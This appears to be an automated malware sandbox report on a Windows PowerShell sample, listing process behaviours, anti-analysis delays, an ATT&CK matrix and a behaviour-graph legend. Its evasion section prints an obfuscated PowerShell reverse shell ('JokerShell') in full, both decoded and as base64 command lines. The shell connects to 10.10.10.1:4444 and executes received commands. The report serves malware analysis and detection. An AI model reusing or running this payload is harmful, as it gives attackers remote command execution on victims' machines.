Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1684Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 390Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3869Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5908Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8144Thread sleep count: 3869 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep count: 5908 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8180Thread sleep time: -23058430092136925s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7492Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000002.00000002.1373818769.000000000792B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAM
Source: svchost.exe, 00000003.00000002.2363600034.000001779062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: svchost.exe, 00000003.00000002.2364464427.0000017795C57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded $str = "TcP"+"C"+"li"+"e"+"nt";$reversed = -join ($str[-1..-($str.Length)]);$PJ = @("54", "43", "50", "43", "6C", "69", "65", "6E", "74");$TChar = $PJ | ForEach-Object { [char][convert]::ToInt32($_, 16) };$PJChar = -join $TChar;;$RtRjmMlY = NeW-oB''JeCT ('S'+'y'+'s'+'t'+'e'+'m'+'.'+'N'+'e'+'t'+'.'+'S'+'ockets.TCPcliEnt')('10.10.10.1',4444);$EnBtywtgh = $RtRjmMlY.('Get'+'Stream')();[byte[]]$PJChar = 0..65535|%{0};while(($i = $EnBtywtgh.ReAd($PJChar, 0, $PJChar.LeNgTh)) -ne 0){;$6a0b5efe = (NeW-oB''JeCT -TypENAme S'y's't'e'm.T'e'x't.'A'S'C'I'IE'n'c'o'd'i'n'g).('Ge'+'tStRinG')($PJChar,0, $i);$3dbfe2ebffe072727949d7cecc51573b = (iex ". { $6a0b5efe } 2>&1" | Ou''t-Str''ing );$J=$O=$K=$E=$R=$P=$W=$R = ${3dbfe2ebffe072727949d7cecc51573b} + '[94mJokerShell[39m ' + (pwd).Path + '> ';$s = ("{0}{1}{3}{2}"-f "se''nd","by","e","t"); $s = ([text.encoding]::ASCii).GetBYTeS($R);$EnBtywtgh.Write($s,0,$s.Length);$EnBtywtgh.Flush()};$RtRjmMlY.Close()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded $str = "TcP"+"C"+"li"+"e"+"nt";$reversed = -join ($str[-1..-($str.Length)]);$PJ = @("54", "43", "50", "43", "6C", "69", "65", "6E", "74");$TChar = $PJ | ForEach-Object { [char][convert]::ToInt32($_, 16) };$PJChar = -join $TChar;;$RtRjmMlY = NeW-oB''JeCT ('S'+'y'+'s'+'t'+'e'+'m'+'.'+'N'+'e'+'t'+'.'+'S'+'ockets.TCPcliEnt')('10.10.10.1',4444);$EnBtywtgh = $RtRjmMlY.('Get'+'Stream')();[byte[]]$PJChar = 0..65535|%{0};while(($i = $EnBtywtgh.ReAd($PJChar, 0, $PJChar.LeNgTh)) -ne 0){;$6a0b5efe = (NeW-oB''JeCT -TypENAme S'y's't'e'm.T'e'x't.'A'S'C'I'IE'n'c'o'd'i'n'g).('Ge'+'tStRinG')($PJChar,0, $i);$3dbfe2ebffe072727949d7cecc51573b = (iex ". { $6a0b5efe } 2>&1" | Ou''t-Str''ing );$J=$O=$K=$E=$R=$P=$W=$R = ${3dbfe2ebffe072727949d7cecc51573b} + '[94mJokerShell[39m ' + (pwd).Path + '> ';$s = ("{0}{1}{3}{2}"-f "se''nd","by","e","t"); $s = ([text.encoding]::ASCii).GetBYTeS($R);$EnBtywtgh.Write($s,0,$s.Length);$EnBtywtgh.Flush()};$RtRjmMlY.Close()Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQAMwAiACwAIAAiADYAQwAiACwAIAAiADYAOQAiACwAIAAiADYANQAiACwAIAAiADYARQAiACwAIAAiADcANAAiACkAOwAKACQAVABDAGgAYQByACAAPQAgACQAUABKACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABbAGMAaABhAHIAXQBbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAXwAsACAAMQA2ACkAIAB9ADsACgAkAFAASgBDAGgAYQByACAAPQAgAC0AagBvAGkAbgAgACQAVABDAGgAYQByADsACgA7ACQAUgB0AFIAagBtAE0AbABZACAAPQAgAE4AZQBXAC0AbwBCACcAJwBKAGUAQwBUACAAKAAnAFMAJwArACcAeQAnACsAJwBzACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKwAnAC4AJwArACcATgAnACsAJwBlACcAKwAnAHQAJwArACcALgAnACsAJwBTACcAKwAnAG8AYwBrAGUAdABzAC4AVABDAFAAYwBsAGkARQBuAHQAJwApACgAJwAxADAALgAxADAALgAxADAALgAxACcALAA0ADQANAA0ACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgAIAA9ACAAJABSAHQAUgBqAG0ATQBsAFkALgAoACcARwBlAHQAJwArACcAUwB0AHIAZQBhAG0AJwApACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFAASgBDAGgAYQByACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAKAHcAaABpAGwAZQAoACgAJABpACAAPQAgACQARQBuAEIAdAB5AHcAdABnAGgALgBSAGUAQQBkACgAJABQAEoAQwBoAGEAcgAsACAAMAAsACAAJABQAEoAQwBoAGEAcgAuAEwAZQBOAGcAVABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAKACQANgBhADAAYgA1AGUAZgBlACAAPQAgACgATgBlAFcALQBvAEIAJwAnAEoAZQBDAFQAIAAtAFQAeQBwAEUATgBBAG0AZQAgAFMAJwB5ACcAcwAnAHQAJwBlACcAbQAuAFQAJwBlACcAeAAnAHQALgAnAEEAJwBTACcAQwAnAEkAJwBJAEUAJwBuACcAYwAnAG8AJwBkACcAaQAnAG4AJwBnACkALgAoACcARwBlACcAKwAnAHQAUwB0AFIAaQBuAEcAJwApACgAJABQAEoAQwBoAGEAcgAsADAALAAgACQAaQApADsACgAkADMAZABiAGYAZQAyAGUAYgBmAGYAZQAwADcAMgA3ADIANwA5ADQAOQBkADcAYwBlAGMAYwA1ADEANQA3ADMAYgAgAD0AIAAoAGkAZQB4ACAAIgAuACAAewAgACAAJAA2AGEAMABiADUAZQBmAGUAIAAgAH0AIAAyAD4AJgAxACIAIAB8ACAATwB1ACcAJwB0AC0AUwB0AHIAJwAnAGkAbgBnACAAKQA7AAoAJABKAD0AJABPAD0AJABLAD0AJABFAD0AJABSAD0AJABQAD0AJABXAD0AJABSACAAPQAgACQAewAzAGQAYgBmAGUAMgBlAGIAZgBmAGUAMAA3ADIANwAyADcAOQA0ADkAZAA3AGMAZQBjAGMANQAxADUANwAzAGIAfQAgACsAIAAnABsAWwA5ADQAbQBKAG8AawBlAHIAUwBoAGUAbABsABsAWwAzADkAbQAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsACgAkAHMAIAA9ACAAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAIgBzAGUAJwAnAG4AZAAiACwAIgBiAHkAIgAsACIAZQAiACwAIgB0ACIAKQA7ACAAJABzACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAGkAaQApAC4ARwBlAHQAQgBZAFQAZQBTACgAJABSACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgALgBXAHIAaQB0AGUAKAAkAHMALAAwACwAJABzAC4ATABlAG4AZwB0AGgAKQA7ACQARQBuAEIAdAB5AHcAdABnAGgALgBGAGwAdQBzAGgAKAApAH0AOwAkAFIAdABSAGoAbQBNAGwAWQAuAEMAbABvAHMAZQAoACkACgA=Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -e jabzahqacgagad0aiaaiafqaywbqaciakwaiaemaigaraciababpaciakwaiaguaigaraciabgb0aciaowakahiazqb2aguacgbzaguazaagad0aiaatagoabwbpag4aiaaoacqacwb0ahiawwatadealgauac0akaakahmadabyac4atablag4azwb0aggakqbdackaowakacqauabkacaapqagaeaakaaiaduanaaiacwaiaaiadqamwaiacwaiaaiaduamaaiacwaiaaiadqamwaiacwaiaaiadyaqwaiacwaiaaiadyaoqaiacwaiaaiadyanqaiacwaiaaiadyarqaiacwaiaaiadcanaaiackaowakacqavabdaggayqbyacaapqagacqauabkacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiabbagmaaabhahiaxqbbagmabwbuahyazqbyahqaxqa6adoavabvaekabgb0admamgaoacqaxwasacaamqa2ackaiab9adsacgakafaasgbdaggayqbyacaapqagac0aagbvagkabgagacqavabdaggayqbyadsacga7acqaugb0afiaagbtae0ababzacaapqagae4azqbxac0abwbcaccajwbkaguaqwbuacaakaanafmajwaraccaeqanacsajwbzaccakwanahqajwaraccazqanacsajwbtaccakwanac4ajwaraccatganacsajwblaccakwanahqajwaraccalganacsajwbtaccakwanag8aywbraguadabzac4avabdafaaywbsagkarqbuahqajwapacgajwaxadaalgaxadaalgaxadaalgaxaccalaa0adqanaa0ackaowakacqarqbuaeiadab5ahcadabnaggaiaa9acaajabsahqaugbqag0atqbsafkalgaoaccarwblahqajwaraccauwb0ahiazqbhag0ajwapacgakqa7afsaygb5ahqazqbbaf0axqakafaasgbdaggayqbyacaapqagadaalgauadyanqa1admanqb8acuaewawah0aowakahcaaabpagwazqaoacgajabpacaapqagacqarqbuaeiadab5ahcadabnaggalgbsaguaqqbkacgajabqaeoaqwboageacgasacaamaasacaajabqaeoaqwboageacgauaewazqboagcavaboackakqagac0abgblacaamaapahsaowakacqangbhadaayga1aguazgblacaapqagacgatgblafcalqbvaeiajwanaeoazqbdafqaiaatafqaeqbwaeuatgbbag0azqagafmajwb5accacwanahqajwblaccabqauafqajwblaccaeaanahqalganaeeajwbtaccaqwanaekajwbjaeuajwbuaccaywanag8ajwbkaccaaqanag4ajwbnackalgaoaccarwblaccakwanahqauwb0afiaaqbuaecajwapacgajabqaeoaqwboageacgasadaalaagacqaaqapadsacgakadmazabiagyazqayaguaygbmagyazqawadcamga3adianwa5adqaoqbkadcaywblagmaywa1adeanqa3admaygagad0aiaaoagkazqb4acaaigauacaaewagacaajaa2ageamabiaduazqbmaguaiaagah0aiaayad4ajgaxaciaiab8acaatwb1accajwb0ac0auwb0ahiajwanagkabgbnacaakqa7aaoajabkad0ajabpad0ajablad0ajabfad0ajabsad0ajabqad0ajabxad0ajabsacaapqagacqaewazagqaygbmaguamgblagiazgbmaguamaa3adianwayadcaoqa0adkazaa3agmazqbjagmanqaxaduanwazagiafqagacsaiaanabsawwa5adqabqbkag8aawblahiauwboaguababsabsawwazadkabqagaccaiaaracaakabwahcazaapac4auabhahqaaaagacsaiaanad4aiaanadsacgakahmaiaa9acaakaaiahsamab9ahsamqb9ahsamwb9ahsamgb9acialqbmacaaigbzaguajwanag4azaaiacwaigbiahkaigasaciazqaiacwaigb0aciakqa7acaajabzacaapqagacgawwb0aguaeab0ac4azqbuagmabwbkagkabgbnaf0aoga6aeeauwbdagkaaqapac4arwblahqaqgbzafqazqbtacgajabsackaowakacqarqbuaeiadab5ahcadabnaggalgbxahiaaqb0aguakaakahmalaawacwajabzac4atablag4azwb0aggakqa7acqarqbuaeiadab5ahcadabnaggalgbgagwadqbzaggakaapah0aowakafiadabsagoabqbnagwawqauaemababvahmazqaoackacga=
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -e jabzahqacgagad0aiaaiafqaywbqaciakwaiaemaigaraciababpaciakwaiaguaigaraciabgb0aciaowakahiazqb2aguacgbzaguazaagad0aiaatagoabwbpag4aiaaoacqacwb0ahiawwatadealgauac0akaakahmadabyac4atablag4azwb0aggakqbdackaowakacqauabkacaapqagaeaakaaiaduanaaiacwaiaaiadqamwaiacwaiaaiaduamaaiacwaiaaiadqamwaiacwaiaaiadyaqwaiacwaiaaiadyaoqaiacwaiaaiadyanqaiacwaiaaiadyarqaiacwaiaaiadcanaaiackaowakacqavabdaggayqbyacaapqagacqauabkacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiabbagmaaabhahiaxqbbagmabwbuahyazqbyahqaxqa6adoavabvaekabgb0admamgaoacqaxwasacaamqa2ackaiab9adsacgakafaasgbdaggayqbyacaapqagac0aagbvagkabgagacqavabdaggayqbyadsacga7acqaugb0afiaagbtae0ababzacaapqagae4azqbxac0abwbcaccajwbkaguaqwbuacaakaanafmajwaraccaeqanacsajwbzaccakwanahqajwaraccazqanacsajwbtaccakwanac4ajwaraccatganacsajwblaccakwanahqajwaraccalganacsajwbtaccakwanag8aywbraguadabzac4avabdafaaywbsagkarqbuahqajwapacgajwaxadaalgaxadaalgaxadaalgaxaccalaa0adqanaa0ackaowakacqarqbuaeiadab5ahcadabnaggaiaa9acaajabsahqaugbqag0atqbsafkalgaoaccarwblahqajwaraccauwb0ahiazqbhag0ajwapacgakqa7afsaygb5ahqazqbbaf0axqakafaasgbdaggayqbyacaapqagadaalgauadyanqa1admanqb8acuaewawah0aowakahcaaabpagwazqaoacgajabpacaapqagacqarqbuaeiadab5ahcadabnaggalgbsaguaqqbkacgajabqaeoaqwboageacgasacaamaasacaajabqaeoaqwboageacgauaewazqboagcavaboackakqagac0abgblacaamaapahsaowakacqangbhadaayga1aguazgblacaapqagacgatgblafcalqbvaeiajwanaeoazqbdafqaiaatafqaeqbwaeuatgbbag0azqagafmajwb5accacwanahqajwblaccabqauafqajwblaccaeaanahqalganaeeajwbtaccaqwanaekajwbjaeuajwbuaccaywanag8ajwbkaccaaqanag4ajwbnackalgaoaccarwblaccakwanahqauwb0afiaaqbuaecajwapacgajabqaeoaqwboageacgasadaalaagacqaaqapadsacgakadmazabiagyazqayaguaygbmagyazqawadcamga3adianwa5adqaoqbkadcaywblagmaywa1adeanqa3admaygagad0aiaaoagkazqb4acaaigauacaaewagacaajaa2ageamabiaduazqbmaguaiaagah0aiaayad4ajgaxaciaiab8acaatwb1accajwb0ac0auwb0ahiajwanagkabgbnacaakqa7aaoajabkad0ajabpad0ajablad0ajabfad0ajabsad0ajabqad0ajabxad0ajabsacaapqagacqaewazagqaygbmaguamgblagiazgbmaguamaa3adianwayadcaoqa0adkazaa3agmazqbjagmanqaxaduanwazagiafqagacsaiaanabsawwa5adqabqbkag8aawblahiauwboaguababsabsawwazadkabqagaccaiaaracaakabwahcazaapac4auabhahqaaaagacsaiaanad4aiaanadsacgakahmaiaa9acaakaaiahsamab9ahsamqb9ahsamwb9ahsamgb9acialqbmacaaigbzaguajwanag4azaaiacwaigbiahkaigasaciazqaiacwaigb0aciakqa7acaajabzacaapqagacgawwb0aguaeab0ac4azqbuagmabwbkagkabgbnaf0aoga6aeeauwbdagkaaqapac4arwblahqaqgbzafqazqbtacgajabsackaowakacqarqbuaeiadab5ahcadabnaggalgbxahiaaqb0aguakaakahmalaawacwajabzac4atablag4azwb0aggakqa7acqarqbuaeiadab5ahcadabnaggalgbgagwadqbzaggakaapah0aowakafiadabsagoabqbnagwawqauaemababvahmazqaoackacga=Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
Browser Extensions		11
Process Injection		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		1
DLL Side-Loading		1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials21
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
